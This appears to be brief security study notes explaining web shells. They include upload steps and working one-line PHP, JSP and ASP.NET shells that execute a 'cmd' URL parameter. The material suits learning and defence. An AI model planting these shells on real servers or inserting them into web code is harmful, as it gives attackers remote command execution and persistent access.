Web Shell

A web shell is a malicious script or backdoor planted on a compromised web server that allows attackers to remotely execute commands, manipulate files, and maintain persistent access.

Typically looks like a harmless web page (e.g., PHP, ASP, JSP) but acts as a control panel for hackers.

How to: Web Shell

1. Upload file containing web shell code to a vulnerable web server through RCE/SQi/File inclusion (local/remote)
2. Navigate to shell file location on the vulnerable webserver through the URL
3. Example web shells:
   • php (Access via ?cmd=whoami in the URL.):

   <?php system($_GET['cmd']); ?>
   

   • jsp:

   <%@ page import="java.io.*" %> 
   <% Runtime.getRuntime().exec(request.getParameter  ("cmd")); %> 
   

   • asp.net:

   	<% Response.Write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>		
   

Why Attackers Use Web Shells

• Persistence: Remain hidden even if other vulnerabilities are patched.
• Data Theft: Exfiltrate databases, config files, or user data.
• Pivoting: Use the server to attack internal networks.
• Distribute Malware: Host phishing pages or malware downloads.